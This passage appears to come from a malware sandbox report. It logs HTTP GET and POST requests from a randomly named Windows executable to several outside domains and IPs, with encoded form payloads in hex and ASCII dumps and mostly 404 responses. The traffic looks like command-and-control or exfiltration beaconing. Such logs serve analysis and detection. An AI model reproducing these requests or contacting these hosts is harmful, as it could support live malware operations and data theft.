                                                                                                                              Data Raw: 6b 54 39 70 3d 76 47 77 4f 4a 33 78 42 46 48 33 4d 32 34 33 2f 51 77 59 45 52 6f 6d 55 4d 46 53 4c 74 49 50 46 4a 62 53 4a 68 43 73 71 4e 52 41 48 58 39 4d 5a 78 67 53 64 44 49 39 7a 4a 30 34 7a 74 6d 54 4f 34 32 47 49 2b 51 41 75 44 31 50 5a 41 37 67 51 6b 52 54 79 62 66 43 6a 72 6f 66 2f 65 66 75 6e 50 76 35 42 71 2f 66 52 4a 32 4d 48 6a 4c 7a 4c 4c 42 54 66 50 76 33 6a 43 4d 64 34 75 72 41 32 63 49 45 69 51 34 6d 54 4e 56 69 54 70 71 33 2f 77 41 53 69 30 38 4a 4b 31 41 4e 6c 70 53 4c 57 63 46 68 6d 6b 4d 61 32 76 51 46 4e 4b 4a 79 67 4f 78 4e 4f 55 4c 50 76 45 58 5a 61 41 31 6c 48 30 73 51 49 38 6c 4d 2b 67 6c 6c 78 6c 34 65 73 59 68 32 30 7a 55 4f 72 43 52 51 4c 64 36 30 4e 41 52 61 5a 4b 37 4f 79 51 71 48 6e 4b 39 71 4c 6f 31 4f 53 43 62 4b 49 72 65 79 77 62 79 32 77 49 65 45 6d 4d 7a 50 37 6b 4d 52 55 57 44 53 71 4d 6a 54 37 5a 32 62 50 37 54 47 49 4e 38 62 49 4e 42 46 33 68 70 33 70 70 78 68 6e 37 52 58 47 49 4d 77 61 67 72 57 34 50 47 30 32 68 53 42 69 35 68 47 4e 44 6f 2b 66 34 48 44 48 66 [TRUNCATED]
                                                                                                                              Data Ascii: kT9p=vGwOJ3xBFH3M243/QwYERomUMFSLtIPFJbSJhCsqNRAHX9MZxgSdDI9zJ04ztmTO42GI+QAuD1PZA7gQkRTybfCjrof/efunPv5Bq/fRJ2MHjLzLLBTfPv3jCMd4urA2cIEiQ4mTNViTpq3/wASi08JK1ANlpSLWcFhmkMa2vQFNKJygOxNOULPvEXZaA1lH0sQI8lM+gllxl4esYh20zUOrCRQLd60NARaZK7OyQqHnK9qLo1OSCbKIreywby2wIeEmMzP7kMRUWDSqMjT7Z2bP7TGIN8bINBF3hp3ppxhn7RXGIMwagrW4PG02hSBi5hGNDo+f4HDHfA7t4kzHVkWSe0c6bsptX56fdBCCQWUMPEEdKLAL+6MDEumpQ9mG04RfW5GlG9p20MmuX91Ulv9B2fn7+tIhaojM3tEdcFfYoQoAicnw4Chf4zijKXtWGeP7zAjAlQXER2e2LlDdsI9DfOJ6JJ+pQXXZO48I9oQ3s7ultrQMkBCQM8Jv8DC51sCCXCDG/WLW9PpG7X9I2sdiP++GwDoFxUiAGDgWAV6sfR5ta3XELAKEv2OK66WiVcoAu4Jp2Et9S4WpWs0eWKnCWs1rGy0Fz8SMjl5KZc8PdK/oLARmlXN0F6waxa7vu5+2Twfhc8T3KWflPATb22kyNTLQY0dxF3FOIm3KIEIM+o5cdB16gjrGfQHdHCCGFZWIrN6CAR7QCkPNInQqZsEBLSvT846pwdcK3gBdg2x6256qHyhArmr7dUlI6xW+17+W80IqZeciLIWL+yW/sKvL2QI0wy+LpfsVGRWw5R0pjB1y74VQYeX79s10oVg7x4moiu0lPUnMa9HwW9Ybzeh+to1LrTUyW7x4OwPG8lpLp4sGxzSXn3cP29fHoRTEi3bohz90CBZ49MmOnRjVllfKDJmKn2BBqYIfrJqUv1ZJbjSis2V1emrexFANEYnwX2MbKkEjSvBZ3069oz7ki2vDrEuLIplmFfRblorIj/5Xp5N [TRUNCATED]


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              4192.168.2.649975198.44.251.203805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:38:59.776449919 CEST404OUTGET /81ii/?kT9p=iEYuKHcgXzrj54zBLQ0hZtaSJWaO6arULYSJgyArOy1vcIlOyDidBtx/KVwStm3n+ESjpSctJ0ezJOALnhKyScKD8qKcTeL6NPgmk/TuCnkayb3nWF3ZDNroKudPs/s9dqx/VNU=&in1Hf=rx3dZnMxlRvDbR HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.n0pme6.top
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              5192.168.2.64997681.2.196.19805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:39:13.372646093 CEST656OUTPOST /whrh/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.kovallo.cloud
                                                                                                                              Origin: http://www.kovallo.cloud
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Length: 209
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.kovallo.cloud/whrh/
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Data Raw: 6b 54 39 70 3d 74 6c 69 2f 69 65 44 54 42 37 74 78 4a 4e 4f 75 49 68 45 6b 4d 77 4d 51 66 6f 34 33 68 31 39 32 69 6f 34 47 6d 72 46 6c 34 50 74 67 32 51 46 37 67 49 2f 64 38 54 64 44 62 6b 65 4b 53 71 59 46 66 4d 51 62 52 76 4e 68 31 44 7a 41 6b 44 38 64 33 2f 55 64 61 2b 61 59 36 33 77 36 7a 43 6a 41 68 64 32 61 69 6e 48 47 78 4b 61 42 65 70 38 47 33 45 32 47 4f 46 6b 47 79 53 4a 52 76 47 58 55 76 35 32 6a 7a 46 44 50 76 36 45 59 79 51 63 7a 6c 47 76 56 4a 4e 46 71 35 78 4d 74 37 6d 62 57 6b 39 70 59 65 75 59 41 71 48 46 38 36 34 37 62 74 41 61 50 4e 7a 65 37 53 54 4a 50 72 70 48 74 57 64 36 72 6e 45 4d 38 6b 76 67 5a
                                                                                                                              Data Ascii: kT9p=tli/ieDTB7txJNOuIhEkMwMQfo43h192io4GmrFl4Ptg2QF7gI/d8TdDbkeKSqYFfMQbRvNh1DzAkD8d3/Uda+aY63w6zCjAhd2ainHGxKaBep8G3E2GOFkGySJRvGXUv52jzFDPv6EYyQczlGvVJNFq5xMt7mbWk9pYeuYAqHF8647btAaPNze7STJPrpHtWd6rnEM8kvgZ
                                                                                                                              Oct 22, 2024 05:39:14.210371971 CEST292INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Tue, 22 Oct 2024 03:39:14 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              6192.168.2.64997881.2.196.19805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:39:15.914376020 CEST680OUTPOST /whrh/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.kovallo.cloud
                                                                                                                              Origin: http://www.kovallo.cloud
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Length: 233
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.kovallo.cloud/whrh/
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Data Raw: 6b 54 39 70 3d 74 6c 69 2f 69 65 44 54 42 37 74 78 50 74 2b 75 4b 41 45 6b 64 41 4d 54 47 6f 34 33 6f 56 39 79 69 6f 30 47 6d 70 6f 39 35 39 5a 67 32 31 35 37 68 4d 54 64 39 54 64 44 51 45 65 57 57 71 5a 4a 66 4d 4d 54 52 72 4a 68 31 44 58 41 6b 43 4d 64 33 4d 4d 63 49 65 62 2b 76 6e 77 34 33 43 6a 41 68 64 32 61 69 6a 58 73 78 4a 71 42 64 59 73 47 6c 6d 65 46 52 31 6c 30 78 53 4a 52 72 47 57 38 76 35 32 4b 7a 42 4c 70 76 35 38 59 79 52 73 7a 68 45 58 4b 54 64 46 73 6d 42 4e 79 37 47 6e 63 70 63 67 6e 61 4d 59 41 38 6b 4e 57 37 4f 36 42 78 7a 61 73 66 6a 2b 35 53 52 52 39 72 4a 48 48 55 64 43 72 31 54 41 62 72 62 46 36 72 55 64 38 41 77 6a 5a 54 70 2b 55 6f 58 61 31 63 33 78 39 56 41 3d 3d
                                                                                                                              Data Ascii: kT9p=tli/ieDTB7txPt+uKAEkdAMTGo43oV9yio0Gmpo959Zg2157hMTd9TdDQEeWWqZJfMMTRrJh1DXAkCMd3MMcIeb+vnw43CjAhd2aijXsxJqBdYsGlmeFR1l0xSJRrGW8v52KzBLpv58YyRszhEXKTdFsmBNy7GncpcgnaMYA8kNW7O6Bxzasfj+5SRR9rJHHUdCr1TAbrbF6rUd8AwjZTp+UoXa1c3x9VA==
                                                                                                                              Oct 22, 2024 05:39:16.762723923 CEST292INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Tue, 22 Oct 2024 03:39:16 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              7192.168.2.64997981.2.196.19805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:39:18.459836960 CEST1693OUTPOST /whrh/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.kovallo.cloud
                                                                                                                              Origin: http://www.kovallo.cloud
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Length: 1245
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.kovallo.cloud/whrh/
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Data Raw: 6b 54 39 70 3d 74 6c 69 2f 69 65 44 54 42 37 74 78 50 74 2b 75 4b 41 45 6b 64 41 4d 54 47 6f 34 33 6f 56 39 79 69 6f 30 47 6d 70 6f 39 35 39 68 67 32 48 68 37 67 72 48 64 6e 54 64 44 54 45 65 47 57 71 59 54 66 4d 55 66 52 75 52 75 31 42 66 41 6d 67 45 64 78 39 4d 63 43 65 62 2b 74 6e 77 35 7a 43 6a 76 68 62 57 65 69 6e 7a 73 78 4a 71 42 64 62 6b 47 7a 45 32 46 4b 31 6b 47 79 53 4a 4e 76 47 58 52 76 35 65 77 7a 42 47 55 75 4a 63 59 79 78 38 7a 6e 6e 76 4b 59 64 46 75 6e 42 4e 36 37 47 71 47 70 63 74 63 61 4e 39 6c 38 6d 52 57 37 2f 48 6a 79 54 43 61 4d 67 71 75 4c 7a 74 5a 6a 65 62 59 66 65 75 34 32 41 73 70 69 61 39 6d 6d 7a 74 78 44 32 32 39 66 61 69 32 72 44 6e 71 57 44 59 71 49 45 6d 70 74 46 46 78 4a 79 7a 47 44 45 72 63 31 47 52 73 32 38 67 6d 37 78 6e 68 5a 58 68 72 53 4e 61 61 38 46 53 70 2f 76 6a 30 37 54 7a 34 39 66 53 52 68 72 50 53 50 51 37 4e 38 52 4c 49 69 4b 42 44 37 35 63 4e 32 47 30 6e 31 45 39 47 4e 6d 46 38 39 42 49 68 31 71 6b 54 72 6c 4f 55 54 70 44 6b 52 35 76 63 2f 79 6a 67 33 [TRUNCATED]
                                                                                                                              Data Ascii: kT9p=tli/ieDTB7txPt+uKAEkdAMTGo43oV9yio0Gmpo959hg2Hh7grHdnTdDTEeGWqYTfMUfRuRu1BfAmgEdx9McCeb+tnw5zCjvhbWeinzsxJqBdbkGzE2FK1kGySJNvGXRv5ewzBGUuJcYyx8znnvKYdFunBN67GqGpctcaN9l8mRW7/HjyTCaMgquLztZjebYfeu42Aspia9mmztxD229fai2rDnqWDYqIEmptFFxJyzGDErc1GRs28gm7xnhZXhrSNaa8FSp/vj07Tz49fSRhrPSPQ7N8RLIiKBD75cN2G0n1E9GNmF89BIh1qkTrlOUTpDkR5vc/yjg3CO1ddkV9OMUG2B9w0YrvGaLHYCaaZxQuGYXKnjQWXIB51YBhYA5QKugUBcTyes994ua35TJazA9jtRp3ecaa7d6G+gH+B6N7FDpbrsByKOc0VK9U1CrhHr3TYd6Ibjfw/JOU3NZ27jZQNkbsvmDmBYbqFOKiuniZYhvRly5SgQPZ2FjI89nDfp1Se15OuFHsG3lyubgHEx/nJ5DDOd4SC7CkVBSV3wC/E0fJDYvq0TehlQta63MqGd823YNZnLEgUWtXn0NYr6RUMfZnib0z7A9/9pPoIepHAYhzfmlHojeARVTGlf1BiQReKWfelW6o/DY/OyUECmL8z8zbdQnLLt7gxtd1/Fd+sxZnj6t71y5hoctV96WDwf5S2etuXrPZpN165y5SvUhC1dCt+M4UwdWlflC7DB2dc7De20PT/a3oHBckreXnDkxGwW9LY1Yr1BnDYt0ZbqbO5XrmTohVns9ioSccxM3WJcsjE0/sy+DOTcfsJQxYlzpxMWyRWgRjinBcjyJwe5V2lz3VS95JcaMwmnXPJj5LKO0V2Qi85zk3CXBNJZmLfhWzhFdVFkHAXLwwf9Hp9SpEbkUPpkXziyGK9EKz+uSXFtD4alE4ElBm0vtDeEGxEwMeIYYh9rSONNiCUXD5C93J79vPtzujBKWRKi3e5l7wwC [TRUNCATED]
                                                                                                                              Oct 22, 2024 05:39:19.312671900 CEST292INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Tue, 22 Oct 2024 03:39:19 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              8192.168.2.64998081.2.196.19805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:39:21.003911972 CEST407OUTGET /whrh/?kT9p=gnKfhumZE8ltP6GxVxsfSkoTPawS2VBtj7Y+npcg3eEMwAInvracgWsTZFjZCdkRXfgdTNdTzgCPtAFV2cUEHvPEtEwM8Ua8v+/63k/H/bL/ar8k5HyBDG0f7Adpr1HKjoqz2Rg=&in1Hf=rx3dZnMxlRvDbR HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.kovallo.cloud
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Oct 22, 2024 05:39:21.844779015 CEST289INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Tue, 22 Oct 2024 03:39:21 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 146
                                                                                                                              Connection: close
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              9192.168.2.649981195.110.124.133805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:39:27.094897032 CEST662OUTPOST /qhr1/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.hentaistgma.net
                                                                                                                              Origin: http://www.hentaistgma.net
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Length: 209
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.hentaistgma.net/qhr1/
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Data Raw: 6b 54 39 70 3d 31 74 61 42 63 71 32 4f 31 7a 37 55 51 61 71 36 63 71 72 54 46 57 65 37 39 2b 44 6d 75 6b 42 70 61 70 35 68 63 61 58 57 71 35 51 75 6d 6f 59 4c 65 64 4d 74 77 76 72 34 6b 61 4d 53 31 6e 6e 51 79 2f 63 4d 57 66 51 46 63 68 6e 63 64 4a 4f 34 58 30 57 31 4b 65 2f 66 69 4f 50 38 67 4c 73 7a 4e 77 64 2b 70 38 69 6e 6b 6c 76 59 4d 58 73 72 73 74 67 4a 31 39 76 4d 6f 35 6c 55 53 58 64 77 78 6c 63 48 48 63 6b 67 53 55 4a 66 62 6d 53 65 68 6d 69 33 41 49 72 61 76 7a 77 49 45 73 42 35 57 59 72 47 76 51 70 34 37 6e 6c 78 61 67 63 36 69 55 69 72 73 75 43 34 70 46 4c 71 70 70 6c 57 5a 57 67 34 5a 33 67 43 50 7a 73 4a
                                                                                                                              Data Ascii: kT9p=1taBcq2O1z7UQaq6cqrTFWe79+DmukBpap5hcaXWq5QumoYLedMtwvr4kaMS1nnQy/cMWfQFchncdJO4X0W1Ke/fiOP8gLszNwd+p8inklvYMXsrstgJ19vMo5lUSXdwxlcHHckgSUJfbmSehmi3AIravzwIEsB5WYrGvQp47nlxagc6iUirsuC4pFLqpplWZWg4Z3gCPzsJ
                                                                                                                              Oct 22, 2024 05:39:27.920222998 CEST367INHTTP/1.1 404 Not Found
                                                                                                                              Date: Tue, 22 Oct 2024 03:39:27 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 203
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 68 72 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qhr1/ was not found on this server.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              10192.168.2.649982195.110.124.133805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:39:29.633151054 CEST686OUTPOST /qhr1/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.hentaistgma.net
                                                                                                                              Origin: http://www.hentaistgma.net
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Length: 233
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.hentaistgma.net/qhr1/
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Data Raw: 6b 54 39 70 3d 31 74 61 42 63 71 32 4f 31 7a 37 55 4b 37 61 36 65 4a 44 54 41 32 65 38 79 65 44 6d 67 30 41 69 61 70 46 68 63 65 4f 54 72 4b 30 75 6d 4a 6f 4c 66 66 6b 74 31 76 72 34 77 4b 4d 62 78 6e 6d 63 79 2f 52 7a 57 65 73 46 63 68 62 63 64 49 2b 34 58 44 43 79 59 2b 2f 52 74 75 50 36 71 72 73 7a 4e 77 64 2b 70 2f 65 4e 6b 6c 6e 59 4d 6e 38 72 74 49 55 49 32 39 76 4e 76 35 6c 55 57 58 63 33 78 6c 63 78 48 64 6f 4f 53 53 46 66 62 69 61 65 69 33 69 32 4c 49 72 63 77 6a 78 48 45 74 6f 54 66 59 43 33 78 47 78 4d 36 31 42 6d 66 57 64 67 2b 6e 69 49 2b 2b 69 36 70 48 54 59 70 4a 6c 38 62 57 59 34 4c 67 73 6c 41 48 4a 71 7a 35 61 55 58 6c 4f 62 6e 44 68 53 69 68 36 74 4f 79 77 64 56 77 3d 3d
                                                                                                                              Data Ascii: kT9p=1taBcq2O1z7UK7a6eJDTA2e8yeDmg0AiapFhceOTrK0umJoLffkt1vr4wKMbxnmcy/RzWesFchbcdI+4XDCyY+/RtuP6qrszNwd+p/eNklnYMn8rtIUI29vNv5lUWXc3xlcxHdoOSSFfbiaei3i2LIrcwjxHEtoTfYC3xGxM61BmfWdg+niI++i6pHTYpJl8bWY4LgslAHJqz5aUXlObnDhSih6tOywdVw==
                                                                                                                              Oct 22, 2024 05:39:30.475660086 CEST367INHTTP/1.1 404 Not Found
                                                                                                                              Date: Tue, 22 Oct 2024 03:39:30 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 203
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 68 72 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qhr1/ was not found on this server.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              11192.168.2.649983195.110.124.133805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:39:32.179908991 CEST1699OUTPOST /qhr1/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.hentaistgma.net
                                                                                                                              Origin: http://www.hentaistgma.net
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Length: 1245
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.hentaistgma.net/qhr1/
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
